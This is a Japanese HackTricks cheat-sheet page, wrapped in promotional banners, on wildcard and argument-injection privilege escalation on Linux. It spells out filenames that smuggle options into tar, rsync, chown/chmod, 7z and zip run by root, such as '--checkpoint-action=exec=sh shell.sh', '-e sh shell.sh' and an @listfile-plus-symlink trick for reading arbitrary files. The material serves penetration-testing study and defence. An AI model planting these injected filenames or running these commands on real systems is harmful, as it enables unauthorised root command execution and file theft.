6.5 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。
chown、chmod
他のファイルにコピーするファイルの所有者とアクセス許可を指定することができます。
touch "--reference=/my/own/path/filename"
これを利用することができます https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (組み合わせ攻撃)
__詳細はこちら https://www.exploit-db.com/papers/33930
Tar
任意のコマンドを実行する:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
これを利用することができます https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar攻撃)
__詳細はhttps://www.exploit-db.com/papers/33930を参照してください
Rsync
任意のコマンドを実行する:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
この脆弱性は、https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻撃) を使用して悪用することができます。
__詳細はhttps://www.exploit-db.com/papers/33930を参照してください。
7z
7zでは、*
の前に--
を使用しても(--
は、次の入力がパラメータとして処理されないことを意味し、この場合はファイルパスのみです)、任意のエラーを引き起こしてファイルを読み取ることができます。したがって、次のようなコマンドがrootによって実行されている場合、悪用することができます。
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
そして、この実行中のフォルダにファイルを作成することができます。@root.txt
というファイルと、ファイルroot.txt
を作成できます。root.txt
は、読み取りたいファイルへのシンボリックリンクです。
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
その後、7zが実行されると、root.txt
を圧縮すべきファイルのリストを含むファイルとして扱います(これが@root.txt
の存在を示しています)。そして、7zがroot.txt
を読み込むと、/file/you/want/to/read
を読み込みますが、このファイルの内容がファイルのリストではないため、エラーが発生します。
詳細は、HackTheBoxのCTFのWrite-upsを参照してください。
Zip
任意のコマンドを実行する:
zip name.zip files -T --unzip-command "sh -c whoami"
__
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか? または、最新バージョンのPEASSにアクセスしたいですか? または、HackTricksをPDFでダウンロードしたいですか? SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。